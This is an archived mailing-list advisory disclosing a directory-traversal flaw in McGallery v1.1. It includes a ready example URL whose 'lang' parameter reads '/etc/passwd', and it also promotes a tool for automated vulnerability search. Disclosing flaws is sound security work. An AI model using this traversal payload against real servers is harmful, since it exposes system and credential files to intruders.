<<< Date Index >>>     <<< Thread Index >>>

Vulnerability: McGallery v 1.1 files reading on disk



Vendor: Phpforum, http://www.phpforums.net/
Product: McGallery v 1.1

Vulnerability: files reading on disk
Consequences: Web server paths are opened 
Risk: High

Description: Attacker can form the query in URL form ang get the access to the 
system files
Example: 
thttp://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd

Discoveried By D_BuG d_bug@xxxxx
NemesisSecurityTeam
http://nemesisoftware.com/

CheckZond free v. 1.0 http://nemesisoftware.com/products.htm
uses the vulnerabilities above for automatic vulnerabilities search (Google 
Hacking technique) and usage.

-- 
Best regards,
 D_BuG                          mailto:d_bug@xxxxx